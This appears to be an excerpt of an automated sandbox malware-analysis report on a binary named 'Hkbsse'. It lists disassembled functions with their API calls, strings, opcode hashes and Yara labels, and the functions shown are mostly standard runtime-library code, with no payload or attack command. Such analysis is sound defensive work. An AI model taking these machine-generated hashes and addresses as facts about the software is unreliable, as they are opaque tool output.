                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: 25e15127ba244c4d74df9ac4efd0bb9420c5a9d23b76875d4ce230f0bd9a8ba6
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: F511D575600300ABEF10AF759D49FDB37ACAF15746F18007AFD85D6292EA74E40087B5
                    Function 0040B9C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 130comCOMMON
                    Download Yara Rule
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040BA27
                    • CoCreateInstance.OLE32(00459010,00000000,00000001,00459020,?), ref: 0040BA43
                    • CoUninitialize.OLE32 ref: 0040BA51
                    • CoUninitialize.OLE32 ref: 0040BB10
                    • CoUninitialize.OLE32 ref: 0040BB24
                    Strings
                    • invalid stoi argument, xrefs: 0040E4A4
                    • stoi argument out of range, xrefs: 0040E49A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Uninitialize$CreateInitializeInstance
                    • String ID: invalid stoi argument$stoi argument out of range
                    • API String ID: 1968832861-1606216832
                    • Opcode ID: 72bf0f80fe7a553fc4c0f57f12d513afca195860e21c68eb08472eb0fc6dd74f
                    • Instruction ID: 4ca269fc41c20fb2f42506ace009d3673a7e148846265e76edda467b4f27b292
                    • Opcode Fuzzy Hash: 72bf0f80fe7a553fc4c0f57f12d513afca195860e21c68eb08472eb0fc6dd74f
                    • Instruction Fuzzy Hash: 67418F71A00204AFDB04DF68CC49BAE77B5EB48715F10852AF405E7691D778A984CB99
                    Function 00434950 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00434987
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043498F
                    • _ValidateLocalCookies.LIBCMT ref: 00434A18
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00434A43
                    • _ValidateLocalCookies.LIBCMT ref: 00434A98
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 1170836740-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 2ac7ba5ff52def4039f4e408c399c9b7849d7006bd45f8f6dc393843d2f98b86
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: D4410A34A00209ABCF10EF69C845ADF7BB4FF89318F14815BE9156B352D779EA01CB99
                    Function 0041EF6F Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _SpinWait.LIBCONCRT ref: 0041EFCC
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EFD8
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EFF1
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041F01F
                    • Concurrency::Context::Block.LIBCONCRT ref: 0041F041
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID: yA
                    • API String ID: 1182035702-575552531
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: c1bac3c45397f19ff15f1c8079396faaf703d4cc50a356fec0ea894be16b9f48
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: F421D3B0D04209DADF24DFA5C8416EEBBF0AF04314F20052FE551A62D2E77D8ACACB59
                    Function 0043EB31 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction ID: e6aeac42739e6ab7cd66bc4c883525bdaa8889de24cd7337cf9c056b5eacb4ab
                    • Opcode Fuzzy Hash: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction Fuzzy Hash: 5A514871905302AFDF21AF77C842A6E7BA4AF0D314F14616FE5209B2C1EB7D89018B5D
                    Function 004425B7 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 373timeCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction ID: a51b9741262bd5fe43f3912e7d7025e293ddec3c87bb67f0f185d4e0872f58d5
                    • Opcode Fuzzy Hash: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction Fuzzy Hash: 82C14A71900205AFEB14AF298E41BAF7BA9AF55354F9501AFF880D7381E7BC9E01C758
                    Function 0040DB90 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 185COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: mtx_do_lock
                    • String ID: list too long
                    • API String ID: 1389037287-1124181908
                    • Opcode ID: 2ccdc388e6daa44e7db4bdf70043273ca535e2eef5ee75df55f5e5e35e32392c
                    • Instruction ID: 1de835894f33fb3089aea11bea25431999ae242630ff531b96c67452afae216b
                    • Opcode Fuzzy Hash: 2ccdc388e6daa44e7db4bdf70043273ca535e2eef5ee75df55f5e5e35e32392c
                    • Instruction Fuzzy Hash: DD61B7B0D04718ABDB20DF65CD89B99B7B4FF04304F1042ABE81DA7291E778A985CF59
                    Function 00431C37 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431C50
                      • Part of subcall function 00431F1F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00431998), ref: 00431F2F
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431C65
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C74
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431D38
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID: pContext$switchState
                    • API String ID: 1312548968-2660820399
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 28a58a2465d583a026d35ed57488f6c87d6b755b90b9bc2941db00793719cab4
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: 2531D835A00214ABCF04EF65C885A6E7379BF5C314F20556BED11A73A2DB78EE05CB98
                    Function 0042E8C0 Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E688
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E6AA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E965
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E971
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 9694649e30401d41b72234d07e7418f217b5c7827242a2584a4def143e057733
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: C9416B79A002149FCF04EF65D484BADB7B5FF48314F5480AAED499B382CB38AD41CB95
                    Function 0449F1D6 Relevance: 10.6, APIs: 7, Instructions: 73COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0449F1DD
                    • _SpinWait.LIBCONCRT ref: 0449F233
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0449F23F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0449F258
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0449F286
                    • Concurrency::Context::Block.LIBCONCRT ref: 0449F2A8
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: 32130f5271b1d6e058e9ae8c66524f69ea3e49c63c31f8801824dd9d7d1aec4e
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: 232151749002198AEF28DFA4C8457EEBBF0AF05314F60051FD151E62D1E772AD48EB55
                    Function 0043F17E Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0043F146: _free.LIBCMT ref: 0043F16B
                    • _free.LIBCMT ref: 0043F1CC
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F1D7
                    • _free.LIBCMT ref: 0043F1E2
                    • _free.LIBCMT ref: 0043F236
                    • _free.LIBCMT ref: 0043F241
                    • _free.LIBCMT ref: 0043F24C
                    • _free.LIBCMT ref: 0043F257
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 534b49149ef6fe1f5aaee1d96a2c981c71fb821ccbb97e781409d237b4b487e5
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 6811A271980B04EADA31FBB2CC47FCBB7BD5F48708F40182EB29D6A052D63CB8188655
                    Function 044BF3E5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 044BF3AD: _free.LIBCMT ref: 044BF3D2
                    • _free.LIBCMT ref: 044BF433
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF43E
                    • _free.LIBCMT ref: 044BF449
                    • _free.LIBCMT ref: 044BF49D
                    • _free.LIBCMT ref: 044BF4A8
                    • _free.LIBCMT ref: 044BF4B3
                    • _free.LIBCMT ref: 044BF4BE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 96e588fad6a2d05644edcae4d2b8b1db16a55e2046c6a843a95729ccdb547896
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 8911FC71A40B44EAED30FBB3CC06FDB7B9C9F04704F40581BB2EDA6552DE65B51A86A0
                    Function 0449FDE8 Relevance: 10.6, APIs: 7, Instructions: 60libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,044A3F5D), ref: 0449FDF6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 0449FE04
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 0449FE12
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 0449FE40
                    • GetLastError.KERNEL32(?,?,?,044A3F5D), ref: 0449FE5B
                    • GetLastError.KERNEL32(?,?,?,044A3F5D), ref: 0449FE67
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0449FE7D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 58735ed1e2fd5e85b8bc912feacad398eca1f64fe3f1388887776f2fbc52a4ae
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: B101A935500301ABBF107BB66C48BAB3BECA954756710052BB801D11A3EE78E4084768
                    Function 00416E50 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    • __Mtx_unlock.LIBCPMT ref: 00416F21
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F72
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F82
                    • __Mtx_unlock.LIBCPMT ref: 00417025
                    • __Mtx_unlock.LIBCPMT ref: 0041712B
                    • __Mtx_unlock.LIBCPMT ref: 00417166
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
                    • String ID:
                    • API String ID: 95294986-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 57ef224f82db242419d5894fb4a60db898c918c1b4a24625dce6041fff2ac3f1
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction Fuzzy Hash: 83C1F271A043089BDB20DFB0C945BEBBBF4AF05304F10456FE81693782EB79A984CB59
                    Function 044970B7 Relevance: 9.3, APIs: 6, Instructions: 336COMMON
                    Download Yara Rule
                    APIs
                    • __Mtx_unlock.LIBCPMT ref: 04497188
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044971D9
                    • std::_Rethrow_future_exception.LIBCPMT ref: 044971E9
                    • __Mtx_unlock.LIBCPMT ref: 0449728C
                    • __Mtx_unlock.LIBCPMT ref: 04497392
                    • __Mtx_unlock.LIBCPMT ref: 044973CD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_
                    • String ID:
                    • API String ID: 1997747980-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 5ffcf8c3e0cb8050eb0a3139b3e83871b2da912d4d9f8f61645cc253454790e3
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction Fuzzy Hash: 8AC19C71910204DBEF24DFA5C985BAFBFE4AF05218F04452FE81697782EB35B904EB61
                    Function 0043FD62 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(?,00408770,00000000), ref: 0043FDAA
                    • __fassign.LIBCMT ref: 0043FF89
                    • __fassign.LIBCMT ref: 0043FFA6
                    • WriteFile.KERNEL32(?,00408770,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0043FFEE
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0044002E
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004400DA
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite__fassign$ConsoleErrorLast
                    • String ID:
                    • API String ID: 4031098158-0
                    • Opcode ID: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction ID: 5c7093ca26383f089595d5279c1be1ab1822dbd5e540b6b74e9a9434c58314bd
                    • Opcode Fuzzy Hash: 328b6fc5b7b9e76dfecc23fb13fe5e5030f7e5522c56b44235f2e1bbc2c421c9
                    • Instruction Fuzzy Hash: 2ED1CD71D002589FDF15CFA8D880AEEBBB5BF49304F28416AE855FB342D635AD06CB58
                    Function 0042E9EE Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 0042EA2F
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042EA37
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EA61
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042EA6A
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 0042EAED
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 0042EAF5
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 1f3a1950eff8c09013561670095c22540fa8b87dd5baeeb1554441bdcab44dd9
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 4A418339B00619AFCF08DF65D454AADBBB5FF48310F40815AE406A7391CB74AD01CF85
                    Function 044AEC55 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                    Download Yara Rule
                    APIs
                    • Concurrency::location::_Assign.LIBCMT ref: 044AEC96
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 044AEC9E
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 044AECC8
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 044AECD1
                    • Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 044AED54
                    • Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 044AED5C
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
                    • String ID:
                    • API String ID: 3929269971-0
                    • Opcode ID: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction ID: 4c5ed41417076db7be57926c2a61ea774c706281852a2af171e6b10d9403b292
                    • Opcode Fuzzy Hash: 49b25dfba4231d1092d72907a374f8640d08d95162733754a91ae26f54d6caf0
                    • Instruction Fuzzy Hash: 96417F79A00619AFDF08DF64C494A6DBBB1FF48315F10816AE416AB791CB30BD11CF80
                    Function 0041EDF6 Relevance: 9.1, APIs: 6, Instructions: 101COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 0041EDFD
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EE27
                      • Part of subcall function 0041F4ED: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041F50A
                    • __alloca_probe_16.LIBCMT ref: 0041EE63
                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 0041EEA4
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041EED6
                    • __freea.LIBCMT ref: 0041EEFC
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16__freea
                    • String ID:
                    • API String ID: 1319684358-0
                    • Opcode ID: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction ID: 07282ca70093aa5fae6e1acffc276a069bf1d2a43c8646ebc404eb48b5e248eb
                    • Opcode Fuzzy Hash: 065b2a76bedeac6d7b0caae837de43f98596e46d9f7352f7a3cb0c113a84db58
                    • Instruction Fuzzy Hash: 14319075A002058FDB14DFAAC9415EEB7F5AF08314F24406FE805E7351DB389E86CBA9
                    Function 0042A136 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 0042A179
                      • Part of subcall function 0042B670: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 0042B6BF
                    • GetCurrentThread.KERNEL32 ref: 0042A183
                    • Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 0042A18F
                      • Part of subcall function 00420498: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 004204AA
                      • Part of subcall function 00420924: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 0042092B
                    • Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 0042A1D2
